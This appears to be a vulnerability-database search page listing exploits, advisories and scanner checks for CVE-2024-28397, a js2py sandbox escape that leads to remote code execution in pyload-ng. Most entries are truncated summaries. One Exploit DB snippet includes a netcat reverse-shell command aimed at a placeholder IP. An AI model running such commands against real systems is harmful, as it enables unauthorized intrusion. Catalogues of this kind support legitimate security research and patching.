Lucene search
+L

22 matches found

Kitploit
Kitploit
added 2026/09/04 4:27 p.m.3 views

Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py-

リモートコード実行 – CVE-2024-28397 pyload-ng / js2py このリポジトリには、js2py の安全でない使用に起因し pyload-ng に影響を与えるリモートコード実行脆弱性 CVE-2024-28397 の Proof-of-Concept PoC エクスプロイトが含まれています。 免責事項: この PoC は教育および研究目的のみ で使用してください。 所有していないシステム、またはテストする明示的な許可を得ていないシステムでは使用しないでください。 作者は、このコードの誤用について一切責任を負いません 。 脆弱性の詳細 CVE ID:...

5.3CVSS6.7AI score0.04548EPSS
SaveExploits22
Kitploit
Kitploit
added 2026/08/31 3:48 p.m.3 views

js2py-Sandbox-Escape-CVE-2024-28397-RCE

CVE-2024-28397 js2py 沙箱逃逸漏洞利用 针对 js2py 沙箱逃逸漏洞 CVE‑2024‑28397 的利用脚本集合,该漏洞允许通过 Python 对象内省实现任意代码执行。 🔍 漏洞概述 js2py 库中存在一个关键的沙箱逃逸漏洞,攻击者可通过 JavaScript 的 Object.getOwnPropertyNames 方法访问 Python 内部对象,从而执行任意 Python 代码。 技术细节 CVE ID : CVE-2024-28397 受影响库 : js2py JavaScript 转 Python 翻译器 攻击向量 : 通过 Python...

5.3CVSS6.7AI score0.04548EPSS
SaveExploits22References2
Kitploit
Kitploit
added 2026/08/29 9:47 a.m.3 views

CVE-2024-28397-Js2Py-RCE

CVE-2024-28397 - Generatore di Payload per l'Evasione della Sandbox Js2Py Questo script genera un payload JavaScript che può essere valutato da Js2Py in ambienti vulnerabili dove gli internals di Python sono esposti tramite wrapper di oggetti. Utilizzo Esecuzione di base di un comando:...

5.3CVSS6.7AI score0.04548EPSS
SaveExploits22
Exploit DB
Exploit DB
added 2026/04/30 12:00 a.m.115 views

Js2Py 0.74 - RCE

Exploit Title: Js2Py 0.74 - RCE Date: 2026-02-03 Exploit Author: Ali Sünbül xeloxa Author Page: https://github.com/xeloxa Vendor Homepage: https://github.com/PiotrDabkowski/Js2Py Software Link: https://pypi.org/project/Js2Py/ Version: payload.js python3 exploit.py -c "nc -e /bin/bash 10.10.10.10...

5.3CVSS6.8AI score0.04548EPSS
SaveExploits22
Packet Storm
Packet Storm
added 2025/12/18 12:00 a.m.193 views

📄 js2py 0.74 Automated Sandbox Escape / Code Execution

js2py version 0.74 automated sandbox escape and remote code execution exploit with a reverse shell. ============================================================================================================================================= | Title : js2py v0.74 Automated Sandbox Escape & Revers...

5.3CVSS8.3AI score0.04548EPSS
SaveExploits22
GithubExploit
GithubExploit
added 2025/09/06 11:39 a.m.275 views

Exploit for CVE-2024-28397

🚨 Remote Code Execution – CVE-2024-28397 pyload-ng / js2py...

5.3CVSS7.6AI score0.04548EPSS
SaveExploits22
Tenable Nessus
Tenable Nessus
added 2025/09/02 12:00 a.m.4 views

Linux Distros Unpatched Vulnerability : CVE-2024-28397

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - An issue in the component js2py.disablepyimport of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call. CVE-2024-28397 Note that...

5.3CVSS6.8AI score0.04548EPSS
SaveExploits22References2
GithubExploit
GithubExploit
added 2025/08/17 4:00 a.m.967 views

Exploit for CVE-2024-28397

CVE-2024-28397-command-execution-poc This vulnerability arises...

5.3CVSS7.2AI score0.04548EPSS
SaveExploits22
Packet Storm
Packet Storm
added 2024/11/18 12:00 a.m.395 views

Pyload Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/stopwatch' class MetasploitModule 'Pyload RCE CVE-2024-39205 with js2py sandbox escape CVE-2024-28397', 'Description' = %q CVE-2024-28397 is sandbox escape ...

9.8CVSS7AI score0.16538EPSS
SaveExploits22
zdt
zdt
added 2024/11/18 12:00 a.m.822 views

Pyload Remote Code Execution Exploit

CVE-2024-28397 is a sandbox escape in js2py versions 0.74 and below. js2py is a popular python package that can evaluate javascript code inside a python interpreter. The vulnerability allows for an attacker to obtain a reference to a python object in the js2py environment enabling them to escape...

9.8CVSS6.8AI score0.16538EPSS
SaveExploits22
Metasploit
Metasploit
added 2024/10/28 12:00 a.m.2081 views

Pyload RCE (CVE-2024-39205) with js2py sandbox escape (CVE-2024-28397)

CVE-2024-28397 is sandbox escape in js2py use exploit/linux/http/pyload/js2pycve202439205 msf undefinedjs2pycve202439205 show actions ...actions... msf undefinedjs2pycve202439205 set ACTION msf undefinedjs2pycve202439205 show options ...show and set options... msf undefinedjs2pycve202439205 run...

9.8CVSS8.3AI score0.16538EPSS
SaveExploits22
Github Security Blog
Github Security Blog
added 2024/09/09 6:17 p.m.51 views

pyload-ng vulnerable to RCE with js2py sandbox escape

Summary Any pyload-ng running under python3.11 or below are vulnerable under RCE. Attacker can send a request containing any shell command and the victim server will execute it immediately. Details js2py has a vulnerability of sandbox escape assigned as CVE-2024-28397, which is used by the...

9.8CVSS7AI score0.16538EPSS
SaveExploits4References5Affected Software1
OSV
OSV
added 2024/09/09 6:17 p.m.46 views

GHSA-R9PP-R4XF-597R pyload-ng vulnerable to RCE with js2py sandbox escape

Summary Any pyload-ng running under python3.11 or below are vulnerable under RCE. Attacker can send a request containing any shell command and the victim server will execute it immediately. Details js2py has a vulnerability of sandbox escape assigned as CVE-2024-28397, which is used by the...

9.8CVSS5.8AI score0.16538EPSS
SaveExploits4References5
OpenVAS
OpenVAS
added 2024/07/10 12:00 a.m.13 views

openSUSE Security Advisory (SUSE-SU-2024:2272-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2024 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

5.3CVSS5.7AI score0.04548EPSS
SaveExploits22References4
OpenVAS
OpenVAS
added 2024/07/08 12:00 a.m.13 views

Mageia: Security Advisory (MGASA-2024-0256)

The remote host is missing an update for the SPDX-FileCopyrightText: 2024 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

5.3CVSS7.1AI score0.04548EPSS
SaveExploits22References4
Tenable Nessus
Tenable Nessus
added 2024/07/03 12:00 a.m.27 views

openSUSE 15 Security Update : python-Js2Py (SUSE-SU-2024:2272-1)

The remote openSUSE 15 host has a package installed that is affected by a vulnerability as referenced in the SUSE- SU-2024:2272-1 advisory. - CVE-2024-28397: Fixed a potential sandbox escape via untrusted JavaScript code bsc1226660. Tenable has extracted the preceding description block directly...

5.3CVSS6.8AI score0.04548EPSS
SaveExploits22References4
OSV
OSV
added 2024/07/02 10:07 a.m.15 views

SUSE-SU-2024:2272-1 Security update for python-Js2Py

This update for python-Js2Py fixes the following issues: - CVE-2024-28397: Fixed a potential sandbox escape via untrusted JavaScript code bsc1226660...

5.3CVSS5.6AI score0.04548EPSS
SaveExploits22References3
GithubExploit
GithubExploit
added 2024/06/21 4:43 a.m.1417 views

Exploit for CVE-2024-28397

Perkenalan 中文 js2py is a popular python...

5.3CVSS7.9AI score0.04548EPSS
SaveExploits22
OSV
OSV
added 2024/06/20 5:15 p.m.18 views

CVE-2024-28397

An issue in the component js2py.disablepyimport of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call...

5.3CVSS7.5AI score0.04548EPSS
SaveExploits22References4Affected Software1
Cvelist
Cvelist
added 2024/06/20 12:00 a.m.35 views

CVE-2024-28397

An issue in the component js2py.disablepyimport of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call...

0.04548EPSS
SaveExploits22References2
Rows per page
Query Builder